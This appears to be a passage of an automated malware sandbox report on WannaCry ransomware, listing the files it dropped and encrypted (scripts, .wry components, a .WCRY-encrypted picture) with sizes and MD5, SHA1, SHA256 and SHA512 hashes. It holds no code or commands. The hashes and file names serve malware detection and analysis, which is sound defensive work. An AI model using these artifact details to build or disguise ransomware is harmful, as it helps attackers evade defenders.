304887938520ffcc6966da83596ccc8688b7eace9572982c224f3fb9c59e6fb2dcaa021a19d2aae47346e954c0d0d8145c723b7143dece11ac7261dc41ba3d40

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 854225.crdownload

Filesize
224KB

MD5
5c7fb0927db37372da25f270708103a2

SHA1
120ed9279d85cbfa56e5b7779ffa7162074f7a29

SHA256
be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

SHA512
a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206

Download Submit
C:\Users\Admin\Downloads\WannaCry.exe:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\c.vbs

Filesize
201B

MD5
02b937ceef5da308c5689fcdb3fb12e9

SHA1
fa5490ea513c1b0ee01038c18cb641a51f459507

SHA256
5d57b86aeb52be824875008a6444daf919717408ec45aff4640b5e64610666f1

SHA512
843eeae13ac5fdc216b14e40534543c283ecb2b6c31503aba2d25ddd215df19105892e43cf618848742de9c13687d21e8c834eff3f2b69a26df2509a6f992653

Download Submit
C:\Users\Admin\Downloads\c.wry

Filesize
628B

MD5
b89243f4557f15f9396a21e01bd92063

SHA1
743860be45c23e5528d959f4e916eb454e6f6d55

SHA256
3467c5024ef0529e3e756dd881ff198f0c2a271c9057f833973b8b32b60eb24b

SHA512
58825ac02a6d1f7bb2b3a759ffc4328168a7b8588220caafe7e5c9cc79b84541ba79069ef5415e792acafc06ed0f013b33bf046cb5e298d1b4c2e4eb8c6afe10

Download Submit
C:\Users\Admin\Downloads\f.wry

Filesize
391B

MD5
cbeed081a61b96164a00942e5106cf2d

SHA1
70aebfd677fcfd84e30a9d1d4f20c7c25ee5361c

SHA256
71c389a523d7bd4d5d3ec46a19a031b20621ada512a618fc83e9c745b3dba6aa

SHA512
56068ae814914209fd4829776817bd8247789e192f79ce09f9f0c2729f23992ec134e4e8e53c8b0cb1dfba93224faf2c1fa22005506a1656d9090c647cb1f6b1

Download Submit
C:\Users\Admin\Downloads\m.wry

Filesize
42KB

MD5
980b08bac152aff3f9b0136b616affa5

SHA1
2a9c9601ea038f790cc29379c79407356a3d25a3

SHA256
402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9

SHA512
100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

Download Submit
C:\Users\Admin\Downloads\u.wry

Filesize
236KB

MD5
cf1416074cd7791ab80a18f9e7e219d9

SHA1
276d2ec82c518d887a8a3608e51c56fa28716ded

SHA256
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

SHA512
0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

Download Submit
C:\Users\Admin\Pictures\SuspendDeny.raw.WCRY

Filesize
162KB

MD5
91842dc314eafd6012725d2770891f28

SHA1
54ac19587108897ed455161906759815260189df

SHA256
90b8e1c193ce9c040514705d40ef8d3e6d01ed7edcdb2ed03c9bade1869e0992

SHA512
55d474a5bdbec8675cda7306f8b8f91e2f09ee81b826cdb02f2274992b9bb80ddf1069f404e9e8b9b36e96723649a9c3caa926ab7ff8741c0d2ff660c2f39571

Download Submit
\??\pipe\LOCAL\crashpad_5264_IPPPOVYMXZGORZUW

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4140-233-0x0000000010000000-0x0000000010012000-memory.dmp

Filesize
72KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads